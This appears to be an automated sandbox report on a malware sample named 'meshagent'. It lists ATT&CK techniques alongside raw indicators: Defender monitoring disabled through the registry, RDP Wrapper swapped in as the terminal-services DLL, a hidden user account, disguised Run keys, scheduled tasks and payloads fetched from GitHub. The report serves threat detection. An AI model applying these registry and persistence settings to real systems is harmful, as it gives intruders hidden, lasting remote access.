meshagent | 15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
30	556	powershell.exe
31	4052	powershell.exe
37	4448	powershell.exe
39	2152	powershell.exe
48	5112	powershell.exe
50	3968	powershell.exe
56	1752	powershell.exe
57	1648	powershell.exe
69	1696	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1352	powershell.exe
1352	powershell.exe
1288	powershell.exe
3960	powershell.exe
2556	powershell.exe
3024	powershell.exe
556	powershell.exe
4448	powershell.exe
2152	powershell.exe
4800	powershell.exe
4052	powershell.exe
5112	powershell.exe
3968	powershell.exe
1752	powershell.exe
1648	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 7 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2452	netsh.exe
4272	netsh.exe
3096	netsh.exe
3704	netsh.exe
4828	netsh.exe
2696	netsh.exe
3252	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 8 IoCs

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4076	attrib.exe
2504	attrib.exe
3528	attrib.exe
2156	attrib.exe

Sets service image path in registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Executes dropped EXE 21 IoCs

pid	Process
2696	MeshAgent.exe
3516	MeshAgent.exe
5040	RDPWInst.exe
2888	MeshAgent.exe
1908	RDPWInst.exe
2156	MeshAgent.exe
4992	RDPWInst.exe
4928	RDPWInst.exe
3988	RDPWInst.exe
456	MeshAgent.exe
4928	RDPWInst.exe
1900	RDPWInst.exe
3796	MeshAgent.exe
3336	RDPWInst.exe
4332	RDPWInst.exe
2960	MeshAgent.exe
3576	MeshAgent.exe
4460	MeshAgent.exe
3960	MeshAgent.exe
1324	MeshAgent.exe
1180	MeshAgent.exe

Loads dropped DLL 6 IoCs

pid	Process
1868	svchost.exe
3648	svchost.exe
2020	svchost.exe
1780	svchost.exe
1292	svchost.exe
5072	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
59	raw.githubusercontent.com
65	raw.githubusercontent.com
69	raw.githubusercontent.com
51	raw.githubusercontent.com
52	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 4 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wgdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\SysWOW64\dll\wrpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\SysWOW64\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\exe\MeshService.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wkernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb	MeshAgent.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0"	reg.exe

Drops file in Program Files directory 61 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.zip	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\update.zip	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files (x86)\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4076	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 21 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MeshAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
396	PING.EXE

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742652743294442"	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
396	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2556	schtasks.exe
5008	schtasks.exe
2340	schtasks.exe
3324	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	69	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1352	powershell.exe
1352	powershell.exe
1288	powershell.exe
1288	powershell.exe
3960	powershell.exe
3960	powershell.exe
2556	powershell.exe
2556	powershell.exe
3024	powershell.exe
3024	powershell.exe
556	powershell.exe
556	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4448	powershell.exe
4448	powershell.exe
2152	powershell.exe
2152	powershell.exe
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe
5112	powershell.exe
5112	powershell.exe
3968	powershell.exe
3968	powershell.exe
4572	powershell.exe
4572	powershell.exe
1868	svchost.exe
1868	svchost.exe
1868	svchost.exe
1868	svchost.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
